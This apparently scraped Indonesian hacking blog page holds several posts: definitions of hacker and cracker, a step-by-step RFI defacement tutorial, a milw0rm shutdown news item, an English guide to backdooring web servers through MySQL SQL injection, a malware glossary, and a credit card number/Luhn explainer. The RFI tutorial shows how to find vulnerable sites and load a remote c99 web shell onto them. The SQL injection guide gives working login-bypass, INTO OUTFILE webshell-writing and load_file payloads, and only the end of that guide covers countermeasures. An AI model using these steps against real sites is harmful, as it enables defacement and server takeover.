menghasilkan yang diinginkan untuk membuktikan baik secara emosional ataupun fisik bahwa ini bisa dilakukan. Kegiatan hacking dilakukkan secara bersungguh-sungguh, dengan ketelitian yang tinggi dalam berinteraksi dengan komputer dalam bermain dan bereksplorasi
Hacker adalah Seseorang yang sangat senang mengeksplorasi suatu program dari suatu system untuk untuk mengetahui batas kemampuannya, dengan mengunakan cara-cara dasar yang akan digunakan oleh orang yang tidak mengerti dan mengetahui bagaimana program itu dibuat dan dengan pengetahuan minimum
terhadap program.  Hacker adalah seorang yang sangat antusias dalam membuat program, dan lebih menikmati membuat program dibandingkan berteori tentang program

Kemampuan atau Skill dari Hacker serta gaya hidup Hacker :
  • Ahli pemrograman, baik itu bahasa C,java,ajax,assembly,PHP,maupun C# yang jelas mengusai lebih dari 2 bahasa pemrograman.
  • Secara sembunyi-sembunyi berusaha menemukan informasi penting dengan cara menjelajah, lebih sering di sebut sebagai cracker.
  • Melakukan Hacking  maupun Carding dengan tujauan pribadi
  • Senang dengan tantangan intelektual dengan ide kreatif rata-rata mempunyai logika yg tinggi
  • Telah melewati tahap newbie atau  tahap dasar hacker.
  • Bisa atau menguasai minimal 3 Sistem operasi,Windows,Linux,dan Free Bsd
Cracking

Cracking adalah kegiatan.memaksa masuk kedalam suatu sistem, menghilangkan copy protection,
atau merusak suatu aplikasi dengan berbasis keygen atau Serial number.
orang yang melakukan kegiatan Cracking ini disebut Cracker.Biasa nya cracker melakukan aksi nya 
dalam bentuk kejahatan.Misalnya mendeface suatu website sehingga web tersebut tidak bisa di akses
serta merusak sistem database web atau  suatu forum,dengan tujuan atau motivasi tertentu.

Etika & Aturan main Hacker


  • Di atas segalanya, hormati pengetahuan & kebebasan informasi.
  • Memberitahukan sistem administrator akan adanya pelanggaran keamanan/lubang di keamanan yang anda lihat.
  • Jangan mengambil keuntungan yang tidak fair dari hack.
  • Tidak mendistribusikan & mengumpulkan software bajakan.
  • Tidak pernah mengambil resiko yang bodoh selalu mengetahui kemampuan sendiri.
  • Selalu bersedia untuk secara terbuka/bebas/gratis memberitahukan& mengajarkan berbagai informasi & metoda yang diperoleh.
  • Tidak pernah meng-hack sebuah sistem untuk mencuri uang.
  • Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.
  • Tidak pernah secara sengaja menghapus & merusak file di komputer yangdihack.
  • Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.

Hirarki Hacker

Mungkin agak terlalu kasar jika di sebut hirarki / tingkatan hacker; istilah ini tidak sepenuhnya bisa di terima oleh masyarakat hacker.  Secara umum yang paling tinggi (suhu) hacker sering di sebut ‘Elite’; di Indonesia mungkin lebih sering di sebut ‘suhu’.Sedangkan, di ujung lain derajat hackerdikenal ‘wanna-be’ hacker atau dikenal sebagai ‘Lamers’.

Elite

Juga dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka mengerti sistemoperasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global.
Sanggup melakukan pemrogramman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya effisien & trampil,menggunakan pengetahuannya dengan tepat. Mereka seperti siluman dapat memasuki sistem tanpa di ketahui, walaupun mereka tidak akan menghancurkan data-data. Karena mereka selalu mengikuti peraturan yang ada.

Semi Elite

Hacker ini biasanya lebih muda daripada Elite.Mereka juga mempunyai kemampuan & pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya). Biasanya dilengkapi dengan sejumlah kecil program cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh hacker kaliber ini, sialnya oleh para Elite mereka sering kali di kategorikan Lamer.

Developed Kiddie

Sebutan ini terutama karena umur kelompok ini masih muda (ABG)&masih sekolah.  Mereka membaca tentang metoda hacking & caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya.Umumnya mereka masih menggunakan Grafik UserInterface (GUI) & baru belajar basic dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.

Script Kiddie

Seperti developed kiddie, Script Kiddie biasanya melakukan aktifitas di atas. Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.

Lamer

Mereka adalah orang tanpa pengalaman & pengetahuan yang ingin menjadi hacker (wanna-be hacker). Mereka biasanya membaca atau mendengar tentang hacker & ingin seperti itu. Penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit. Biasanya melakukan hacking menggunakan software trojan, nuke & DoS. Biasanya menyombongkan diri melalui IRC channel dsb. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.

Tips Menjadi Hacker

Untuk menjadi Hacker, yang diperlukan pertama sekali adalah keinginan. Karena yang jadi pertanyaan bukanlah ‘Apakah saya akan menjadi seorang Hacker ?’, tetapi ‘Apakah saya ingin menjadi seorang Hacker ?’. Jika anda telah memiliki keinginan, maka anda telah memiliki sebuah modal dasar sebagai pijakan anda anda dalam melangkah.
Segala sesuatu pasti dimulai dari impian, dan sudah pasti jika anda memiliki impian, anda akan mencoba untuk merealisasikannya. Intinya, sebelum melangkah yakinkan kalau anda telah miliki keinginan.

Pelajari bahasa pemprograman

Hal pertama yang harus anda pelajari adalah bahasa pemprograman. Saat ini di dalam distribusi sistem operasi Linux, terdapat beragam tool-tool berguna yang akan menunjang anda untuk belajar memprogram. Untuk mendapatkan Linux saat ini sudah sangat mudah, anda bisa membelinya secara online (www.gudanglinux.or.id), mendapatkan Copy-an CD nya dari teman. Atau jika anda mempunyai akses internet yang baik, anda bisa langsung mendownload distribusi linux situs resmi-nya, atau melalui www.linuxiso.com. Menurut Eric S. Raymond, bahasa pemprograman yang baik untuk anda pelajari pertama sekali adalah ‘Python’. “Desain-nya bersih, terdokumentasi dengan baik dan cukup mudah bagi pemula”

Pelajari dan kembangkan salah satu Unix OpenSource.

Mengapa Linux/Unix OpenSource begitu penting ? Ini semua tidak lepas dari semangat OpenSource itu sediri. Dengan mempelajari kode-kode yang dirilis bebas dalam sistem operasi OpenSource, kita dapat mempelajari pola pikir seorang programmer/Hacker, kita dapat menemukan cara mereka dalam meyelesaikan masalah dan mencoba mencari metoda penyelesaian masalah yang lebih baik dari apa yang mereka lakukan. OpenSource juga membantu kita dalam membangun sebuah aplikasi, sehingga kita tidak perlu direpotkan dengan ‘research’. Mereka telah melakukan-nya untuk kita, dan kita bisa memanfaatkan waktu yang tersisa untuk hal yang lebih spesifik.
“Saya bisa berpandangan jauh, karena saya berdiri di pundak orang-orang jenius terdahulu .. ” [Sir Isaac Newton]

Pelajari hal-hal baru

Banyak hal-hal baru muncul, dan setiap hal (apapun) akan memberikan kita pelajaran berarti untuk hidup dan hidup adalah HACKING. Hindarilah untuk bersikap skeptis dan mulailah untuk berpikiran terbuka. Hal-hal baru -terlebih-lebih yang begitu radikal-, banyak di tentang oleh sebagian orang skeptis, namun sebuah pemikiran terbuka akan memberikan alur yang baik dalam memperolah ilmu. Ilmu ada dimana-mana. Bahkan dalam suatu yang dianggap kotor. Sebagai contoh, coba anda bandingkan ‘kotoran’ sapi (hewan herbivora) dengan ‘kotoran’ kucing (hewan karnivora). Dapat kita lihat kalau kotoran sapi ‘lebih menggunung’ dari pada kotoran kucing, dan tidak terlepas dari itu, secara umum dapat kita tarik kesimpulan, bahwa hewan herbivora (pemakan tanaman) lebih banyak dari pada hewan karnivora (pemakan daging). Penyebab yang paling relevan untuk hal ini adalah faktor ‘makanan’. Tumbuhan yang dikonsumsi oleh hewan herbivora (dalam contoh ini sapi) mengandung ‘selulose’ atau serat lebih sulit dicerna, sehingga lebih banyak meninggalkan zat sisa. Hal ini tidak berlaku pada hewan karnivora (dalam contoh ini kucing). Daging lebih mudah dicerna, sehingga hanya meninggalkan sedikit zat sisa.
Dengan sedikit imajinasi kotor, coba bayangkan hal-hal yang lebih kotor lagi untuk dianalisa dan diambil pelajarannya. Dalam lingkup komputer, pelajarilah semua hal-hal baru. Anda bisa menemukan banyak hal baru melalui artikel, journal, atau berita-berita ‘nerd’ di ‘slashdot’.

Selalu gunakan logika

Berpikir dengan logika sangat diperlukan dalam Hacking. Dalam Hacking anda akan berhadapan dengan berbagai keadaan untuk dianalisa dan dipecahkan secara logika. Logika akan sangat membantu anda untuk menghidupkan kembali rasionalitas yang hilang dan berpikir membantu anda untuk hidup dan tetap hidup.

Ikuti perkembangan teknologi dan informasi

Teknologi Informasi berkembang sangat cepat. Sebuah bahasa pemprograman yang kita pelajari hari ini bisa cepat berganti dengan bahasa atau visual programming baru yang lebih mudah –baca memudahkan, alih-alih membodohkan-. Semua itu berganti seiring berlalunya waktu dan ketika kita tersadar kita sudah jauh ketinggalan.
Ada baiknya anda selalu membaca, atau minimal mendapatkan ‘digest’ dari ilmu-ilmu/info terbaru. Anda juga bisa mendapatkan informasi dari Mailing List dan NewsGroup. Dengan selalu up-to-date, anda akan selalu dekat dengan informasi.

Ketahui hal-hal yang belum diketahui

Dalam apapun didunia ini, kita harus bercermin. Buang semua prasangka dan nilai-nilai. Buang anggapan sepihak kalau ‘saya adalah seorang wizard’. Duduklah sejenak dan mulai berpikir.


Mengabdi kepada budaya Hacker

Setelah semuanya selesai dan anda sedang beristirahat setelah aktifitas Hacking 37 Jam yang melelahkan. Coba ingat kembali.
  • Siapa yang memperkenalkan anda kepada komputer ?
  • Siapa yang membimbing anda mempelajarinya ?
  • Siapa yang dengan setia menemani anda mengejar informasi ?
  • Siapa yang pertama sekali mengenalkan anda dengan HACKING ?
  • Siapa yang mengajari anda teknik-teknik Hacking Dasar ?
  • Siapa yang mengajari anda tentang bersikap dan berfikir layaknya HACKER ?
  • Siapa yang membuat sistem operasi Hacker, Linux ?
  • Siapa yang mengembangkannya ?
Jangan pernah cepat puas,tetapi ingatlah jangan pernah menjadikan anda besar kepala atau sombong.Ingatlah saat anda dahulu berada di titik 0.Gunakan ilmu yang anda kuasai dengan bijak dan membantu sesama.Cukuplah untuk pengetahuan,Kenap...?karena tiudak kehidupan yang jelas dari seorang hacker.Apalagi hingga menjadi mafia/cyber crime.










READ MORE - Hacker or Cracker

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Cara mendefaca dengan RFI (Remote File Inclusion)

Author : kiddies As cr4sh3r_1412
E-mail : crasher_1412 [at] yahoo [dot] com

ketemu lagi dengan gue, ini adalah tutorial kedua gue, mungkin gue disini akan menceritakanbagaimana akhirnya bisa mengerti metode RFI Hacking


sebelum kita masuk kedalam RFI ada baiknya mengetahui Web-hell dahulu,sebab nanti ini kan di pakai dalam RFI
macam-macam web-shell:
1. c99
2. c100
3. r57
4. ekin0x
5. locus7

bagamana mencarinya backdoor tersebut, kita cari melalui google

lagi-lagi intro nih, yups betul, agar lebih paham aja gitu
RFI apa itu????
RFI(Remote File Inclusion) adalah salah satu metode hacking dengan memanfaatkan pintu belkang atau sering disebut backdoor!

=======
PERTAMA
=======
sebelum penyerangan,marilah kita berdoa menurut agama dan kepercayaan masing2...........

AMIEN !!!

=======
KEDUA
=======
ok setelah kita bedoa, bukalah www.milw0rm.com
kemudian klik search
kemudian tulislah RFI

========
KETIGA
========
udah kebuka tuh banyak sekali bug RFI disitu, pilih salah satu

=========
KEEMPAT
=========
setelah kita dapat bugnya kemudian kita search denga google

example bug:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[evil code]

========
KELIMA
========
kemudian search lah dengan google, apabila kita telah mendapatkan sitenya, trus kita taro file backdoor

example:
wwww.coba-coba.com/administrator/component/com_profiler/plugin.class.php?mosConfig_absolute_path=www.punyague.net/backdoor/c99.txt??

========
KEENAM
========
apabila dibrowser tidak ada tampilan apa2 hanya tampilan site biasa,maka site tersebut sudah tidak vuln lagi
apabila dibrowser anda ada tampilan backdoor, maka site tersebut telah anda kuasai, dan selanjutnya terserah anda...

perintah yang berguna saat melakukan aktivitas backdooring:

cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
fined = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url


sekian tutorial dari gue, bukannya gue mau sok tahu, tapi gue cuma mau berbagi apa yang udah gue dapet selama ini, apabila da yang kurang
mohon muf



gretz: Mywisdom,flyf_666,petimati,7460,gunslinger_,sat_ n soon
we are devilzc0de crew run with bug n exploits
READ MORE - Cara mendefaca dengan RFI (Remote File Inclusion)

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Milw0rm shutdown

One of the major sources of proof of concept (PoC) exploits on the Internet, milw0rm.com, will be closing down. The website's maintainer, str0ke, announces that he can't commit anymore to reviewing exploits submitted by third-parties, in a timely manner.

While this is sad news for people familiar with the exploit release scene, as well as a fair amount of script kiddies by some accounts, it might not mean much for the uninitiated without some background history.

Milw0rm was originally the name of a group of hackers with members from various parts around the globe that communicated with each other over IRC (Internet Relay Chat). The outfit went on to achieve international fame after it took credit for compromising the computer network of India's Bhabha Atomic Research Centre (BARC) in Bombay and gaining administrative access (root) on multiple systems during the night of June 3, 1998.

The hackers walked off with confidential emails and classified documents about nuclear tests, amounting to around five megabytes. The first news outlet to break out the story at the time was Wired, which the collective contacted with proof of their feat.

The reasons behind the attack were mostly political in nature. The group's members, who were still teenagers at the time, wanted to show their disapproval over the development and testing of atomic weapons, making this pretty clear by defacing the BARC home page and posting pacifist messages.

"I like the world in its current state (i guess), well its better than the world would be if the b0mb went b00m. think about it k1dz, its not clever, its not big, so don't think destruction is cool, coz its not […] So India, LISTEN TO WISE OLD MILWORM ... You do not need nuclear weapons in the 1990s!#@!" a part of the message, which was signed by JF, VeNoMouS, Hamst0r, Keystroke, savec0re and ExtreemUK, read.



The group disbanded soon after this high-profile hack, or at least its members stopped being hacktivists. Several years later, in 2004, Keystroke, who is, today, better known as str0ke, went on to set up milw0rm.com as a place to publish PoC exploits, with the consent of some of his former comrades.

In order to ensure a high quality for the published content, str0ke personally verified and tested all exploits submitted by other hackers, something that, unfortunately, he can no longer do. "Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't," a message from str0ke displayed on the home page reads.

He goes on to explain that, "For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site." Finally, the hacker extends his thanks to everyone who contributed to the website. "I appreciate and thank everyone for their support in the past. Be safe, /str0ke," he signs off.

references : cruzen
READ MORE - Milw0rm shutdown

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Backdoor webserver using MySQL SQL Injection

MySQL Database is a great product used by thousand of websites. Various web applications use MySQL as their default database. Some of these applications are written with security in mind, and some are not. In this article, I would like to show you how you can exploit SQL injection in order to gain almost full control over your webserver.

Most people know that SQL injection allows attackers to retrieve database records, pass login screens, change database content, through the creation of new administrative users. MySQL does not have a built-in command to execute shell commands, like Microsoft SQL server. I will show you how to run arbitrary commands using standard features provided by MySQL.

First of all, I would like to give a brief description of SQL injection, then I would like to present you with a couple less known methods that exist in MySQL, which I will use to backdoor a webserver. I will use 2 built-in MySQL commands - one that writes arbitrary files and the one that can be used to read arbitrary files. After that I will describe webshells and go to the attack itself.
What is SQL Injection?

SQL injection is an attack that allows the attacker to add logical expressions and additional commands to the existing SQL query. This attack can succeed whenever a user has submitted data that is not properly validated and is glued together with a legitimate SQL query.

For example, the following SQL command is used to validate user login requests:
$sql_query = "select * from users where user='$user' and password='$pass'"

If the user-submitted data is not properly validated, an attacker can exploit this query and pass the login screen by simply submitting specially crafter variables. For example, attacker can submit the following data as a $user variable: admin' or '1'='1 . When this $user variable is glued together with the query, it will look as followed:

$sql_query = "select * from users where user='admin' or '1'='1' and password='$pass'"


Now, the attacker can safely pass the login screen because or '1'='1' causes the query to always return a "true" value while ignoring the password value.

Using similar techniques, an attacker can retrieve database records, pass login screens, and change database contents, for example by creating new administrative users. In this document, I will show how by applying similar techniques, we will be able to execute arbitrary shell commands.
Command 1- Writing arbitrary files

MySQL has a built-in command that can be used to create and write system files. This command has the following format:

mysq> select "text" INTO OUTFILE "file.txt"

One big drawback of this command is that it can be appended to an existing query using UNION SQL token.

For example, it can be appended to the following query:
select user, password from user where user="admin" and password='123'

Resulting query:
select user, password from user where user="admin" and password='123' union
select "text",2 into outfile "/tmp/file.txt" -- '

As a result of the above command, the /tmp/file.txt file will be created including the query result.
Command 2- Reading arbitrary files

MySQL has a built-in command that can be used to read arbitrary files. The syntax is very simple. We will use this command for plan B.

mysql> select load_file("PATH_TO_FILE");
Webshell


Webshell is a polpular and widely used tool for executing shell commands from within the web browser. Some call these tools PHP shells. We will create a very simple webshell that will execute shell commands.

Here is the code of a very basic PHP shell (parameter passed by cmd will be executed):


For example, in the following screenshot, id command is executed.



Attack Scenario

1. Find SQL injection

It is out of the scope of this document. You must first find SQL injection.

2. Find a directory with write permission

To create a webshell PHP script, we need a directory with write permission on. Temporary directories used by popular Content Management Systems are a good choice for this. Check the following urls to find one:

* hxxp://www.target.com/templates_compiled/
* hxxp://www.target.com/templates_c/
* hxxp://www.target.com/templates/
* hxxp://www.target.com/temporary/
* hxxp://www.target.com/images/
* hxxp://www.target.com/cache/
* hxxp://www.target.com/temp/
* hxxp://www.target.com/files/

In our example we will use a temp directory.

3. Exploit SQL injection - create web shell

You need to append the following string to the legitimate SQL command:

UNION SELECT "",2,3,4 INTO OUTFILE "/var/www/html/temp/c.php" --
Some explanation:

* 2,3,4 are just a qualifier that used to make the same number of columns as in the first part of the select query.
* /var/www/html is a default web directory in the RedHat-like distributions (Fedora, CentOS).
* temp is a directory with full write access. In your case it could be a different directory.

The above command will write the query's result with the "" string appended. Because we added a php extension to the file name, this string will be treated as a PHP command and will allow us to execute shell commands!

4. Execute shell commands

Now it is the easiest part. Simply open the webserver to execute shell commands. In our example it will be:

* hxxp://www.target.com/temp/c.php?cmd=SHELL_COMMAND

For example:

* hxxp://www.target.com/temp/c.php?cmd=id

Plan B

In case you failed to create a PHP file due to a wrong path, there are a number of workarounds:

1. Generate PHP errors.

You need to create a situation when a PHP script will fail and the full disk path will be printed in the error message. You can play with page parameters to make this happen.

2. Find the file that will print phpinfo().

In some cases you will be lucky and you will get a phpinfo() function executed. This function prints a wealth of PHP internal information including the current directory location.

Try to access the following urls:

* hxxp://www.target.com/phpinfo.php
* hxxp://www.target.com/test.php
* hxxp://www.target.com/info.php

3. Look for a default web directory location.

You need to get a default web directory location for a web server. Check the following page since it has a big list of default Apache configurations that are used in different distributions.
http://wiki.apache.org/httpd/DistrosDefaultLayout

4. Read the Apache configuration files.

MySQL has a built-in command that allows the attacker to read arbitrary files. We can exploit this command to read Apache configuration files and study directory structures. Simply use the load_file() MySQL function.

For example (SQL query after injection):
select user, password from user where user="admin123" and password='123' UNION select load_file("/etc/apache2/apache2.conf"), 2 -- '

Note:
You can find a location of Apache configurations at this resource:
http://wiki.apache.org/httpd/DistrosDefaultLayout
Limitation

In order to allow the above to work, the MySQL user used by this application must have a FILE permission. For example by default, a "root" user has this permission on. FILE is an administrative privilege that can only be granted globally (using ON *.* syntax).

For example, if the MySQL user was created using the following command, the user will have this FILE permission on.
GRANT ALL PERMISSIONS to *.* to 'USER_NAME'@'HOST_NAME' IDENTIFIED BY 'PASSWORD'
Countermeasures

1. Install the GreenSQL database firewall.

GreenSQL is an open source database firewall that can automatically block the commands described above: load_file and INTO OUTFILE. By default, GreenSQL blocks administrative and sensitive SQL commands. In addition, GreenSQL prevents SQL injections by calculating the risk of each query and blocking queries with high risk. For example , UNION token and SQL comments are taken into account. Check the application website for more information http://www.greensql.net/

2. Do not use MySQL root user to access the database.

Do not use administrative users to access the database. It is recommended to create a distinct user with hardened permissions to access specific databases.

3. Revoke FILE permission from the MySQL user used in your applications.

mysql> REVOKE FILE ON *.* from 'USER_NAME'@'HOST_NAME';

4. Application code review.

Ensure that your application does not have any SQL injections and that the code is updated.
Links

1. MySQL Injection Cheat Sheet
http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

2. SQL Injection Cheat Sheet
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

3. MySQL Documentation
http://dev.mysql.com/doc/

sumber:http://devilz-kiddies.blogspot.com
READ MORE - Backdoor webserver using MySQL SQL Injection

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Create a Live Windows CD

Take a look at http://www.lachiesadicristo.it/w98cd/default.htm.

It
 guides you how to create a live, bootable CD with Windows on. Once the 
CD is created, you can use it on any PC (with enough RAM) to run 
Windows, without even touching the hard drive.

It's easy to do if
 you know Windows well. I have once of these CD's I made with tools to 
fix up my PC if it was to ever develop a problem. Very useful indeed.

It's recommended you use Windows 98, but if you have a powerful PC with more than 512MB RAM, you could use Windows Me easily.

Just
 take note that some of the tools listed in the tutorial have now 
disappeared from the net, making them hard to find. I will post links to
 the missing tools when I track them down or upload them to my site.
READ MORE - Create a Live Windows CD

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

jenis-jenis malware :

1. Virus
Inilah istilah yang sering dipakai untuk seluruh jenis peangkat lunak yang mengganggu komputer. Bisa jadi karena inilah tipe malware pertama yang muncul.
2. Worm
Worm alias cacing, begitu sebutannya. Kalau virus bersarang pada suatu program atau dokumen, cacing-cacing ini tidak demikian. Cacing adalah sebuah program yang berdiri sendiri dan tidak membutuhkan sarang untuk menyebarkan diri.
3. Wabbit
Istilah ini mungkin asing, tapi memang ada malware tipe ini. Seperti worm, wabbit tidak membutuhkan suatu program dan dokumen untuk bersarang. Tetap berbeda dengan worm yang menyebarkan diri ke komputer lain menggunakan jaringan, wabbit menggandakan diri secara terus menerus di dalam sebuah komputer lokal dan hasil penggandaan itu akan menggerogoti sistem sehingga menyebabkan komputer berjalan lambat.
4. Keylogger
Hati-hati kalau berinternet di warnet atau di kantor yang mempunyai aturan ketat. Bisa saja pada komputer itu diinstali suatu perangkat lunak yang dikenal dengan istilah keylogger yang mencatat semua tekanan tombol keyboard. Catatan yang disimpan dalam suatu file yang bisa dilihat kemudian itu lengkap. Di dalamnya bisa terdapat informasi seperti aplikasi tempat penekanan tombol dilakukan dan waktu penekanan. Dengan cara ini, seseorang bisa mengetahui username, password, dan berbagai informasi lain yang dimasukkan dengan cara pengetikan.
5. Browser Hijacker
browser hijackermengarahkan browser yang seharusnya menampilkan situs yang sesuai dengan alamat yang dimasukkan ke situs lain.
6. Troya
Bisa saja suatu program dibuat seolah-olah adalah antivirus gratis. Memang program itu menghapus suatu virus, tapi ternyata selain itu, ia juga memasukkan virus lain ke dalam komputer. Bedanya dengan virus dan worm, Troya tidak dapat menggandakan diri. Tapi virus atau worm yang "nebeng" di dalamnya bisa saja.
7. Spyware
Spyware adalah perangkat lunak yang mengumpulkan dan mengirimkan informasi tentang pengguna komputer tanpa diketahui oleh si pengguna itu. Informasinya bisa saja yang tidak terlampau berbahaya seperti pola berkomputer, terutama berinternet, seseorang, sampai yang berbahaya seperti nomor kartu kredit, PIN untuk perbankan elektronik (e-banking), dan password suatu akun.
8. Backdoor
Ratware adalah sebutan untuk backdoor yang mengubah komputer menjadi zombi yang mengirimkan spam. Backdoor lain mampu mengacaukan lalu lintas jaringan, melakukan brute force untuk meng-crack password dan enkripsi, dan mendisitribusikan serangan distributed denial of service (DDoS).
9. Dialer
Hati-hati apabila koneksi Internet di rumah Anda menggunakan dial-up. Andaikata komputer yang digunakan, tak ada hujan tak ada badai, berusaha menghubungkan diri ke Internet. Padahal tidak ada satu pun perangkat lunak yang dijalankan membutuhkan koneksi, maka layaklah dicurigai. Komputer kemungkinan telah terjangkit oleh malware yang terkenal dengan istilah dialer.


READ MORE - jenis-jenis malware :

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Rahasia Credit Card Number




Apakah Anda pernah berpikir tentang pentingnya nomor kartu kredit, dan bagaimana mereka dihasilkan angka? Atas dasar ilmu pengetahuan, yang saya akan menggambarkannya CREAD nomor kartu RAHASIA ...
Pertama anda perlu mengetahui bagian-bagian dari serangkaian angka pada kartu kredit.



16 nomor yang Anda bisa  lihat di Visa atau kartu kredit MasterCard, 6 digit pertama dari "pengenal penerbit", yaitu jenis kode kartu kredit.
Jika mendahului, 6-digit 4 yang berarti bahwa kartu kredit Visa.
Namun, jika 6 digit, diawali dengan 5, yang berarti bahwa berjenisMasterCard kartu kredit.
Selanjutnya, 1 digit terakhir untuk 16 digit kartu kredit berfungsi sebagai "bit cek", yang fungsinya hanya untuk nomor kartu kredit, memeriksa validitas kartu.
Sejak awal 6 digit dan 1 digit sudah merasakannya berarti hidup 9 digit yang tersisa di pusat, yang berfungsi sebagai "nomor rekening".
Oleh karena itu, ada 10 nomor mungkin (angka 0 sampai 9), yang dapat dimasukkan ke dalam setiap digit 9-tenang "nomor rekening", yang dihasilkan kombinasi angka nomor 9-digit 1 miliar yang mungkin untuk setiap jenis kartu kredit ( 
Visa atau MasterCard).
Algoritma yang digunakan untuk membuat garis 16 digit untuk nomor kartu kredit Anda algoritma yang disebut "Luhn" atau "Mod 10".
Kembali pada tahun 1954, Hans Luhn IBM adalah orang yang pertama kali mengusulkan penggunaan algoritma untuk menentukan apakah atau tidak itu adalah nomor kartu kredit yang valid.
Cara kerjanya adalah algoritma sederhana (tapi bagus), adalah sebagai berikut:
1. 
Dimulai dengan digit pertama, dikalikan dengan semua angka yang menempati aneh dua digit, sehingga akan ada total 8 digit, kalikan dengan 2, angka yaitu 1, 3.5, 7, 9, 11, 13 dan 15
2. 
Jika hasil perkalian dua angka telah membawa total 2 digit (10, 12,14, 16 atau 18), menambah jumlah setiap digit untuk menghasilkan angka 1-digit, bahwa hasil dari langkah pertama dan kedua adalah disediakan dalambentuk angka delapan.
3. 
Langkah selanjutnya, ganti semua angka (nomor kartu kredit) terletak di posisi digit ganjil dengan 8 karakter baru, membuat seri baru dari 16 digit.
4. 
Langkah terakhir, tambahkan-16 angka. Jika kali hasil penjumlahannya 10, yang berarti bahwa nomor kartu kredit yang valid, dan sebaliknya, jika tidak lebih 10, yang berarti bahwa nomor kartu kredit Anda tidak valid.
Berikut adalah contoh dari perhitungan sendiri:



Seperti yang dapat Anda lihat pada gambar di atas ini, nomor kartu kredit 4552 7204 1234 5678, dari awal sampai 4, yang berarti bahwa kartu Visa.
Sekarang kita harus zrátajte.





Jika Anda sudah menghitung dengan cermat, Maka anda akan melihat bahwa angka terakhir  adalah 61, yang bukan kelipatan dari 10 nomor, sehingga Anda dapat memastikan bahwa nomor kartu kredit Anda tidak valid.
Jika "check digit" dalam hal ini adalah 8, dan 7, maka algoritma akan nomor kartu kredit yang valid, karena total penjumlahannya akan berubah menjadi 60, jumlah kelipatan 10
Berikut contoh lain:



Bagaimana...? Anda menghitung sendiri total penjumlahannya apakah  adalah 65, jadi nomor kartu kredit tidak valid, karena nomor 65 bukan kelipatan 10.
Jika hanya "mengatur jumlah" kartu kredit bukan 3, tapi 8, maka hasilnya akan penjumlahannya 70, yang merupakan kelipatan 10, maka nomor kartu kredit anda valid (algoritma).
Definisi di atas adalah perhitungan matematis sah berlaku, itu tidak berarti, nomor kartu kredit dengan kepastian yang mutlak bahwa nomor kartu kredit asli.
Dalam rangka untuk memeriksa kartu kredit (pada saat transaksi online, misalnya), perlu tidak hanya nomor kartu kredit saja, tetapi juga "tanggal kadaluwarsa", dan "kartu kode keamanan", atau juga disebut CVV (KartuVerifikasi Nilai) atau CVC (Kode verifikasi kartu), yang merupakan 3 digit terakhir dari kartu kredit.
P.S. 
: Untuk kartu kredit American Express, jumlah digit ke tempat 16, namun cuma15, dan selalu dimulai dengan 34 atau 37 untuk 2 digit pertama.Mengenai "nomor rekening", itu hanya memiliki panjang 8 digit, bukan 9 digit, seperti jenis kartu kredit Visa atau MasterCard.

READ MORE - Rahasia Credit Card Number

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS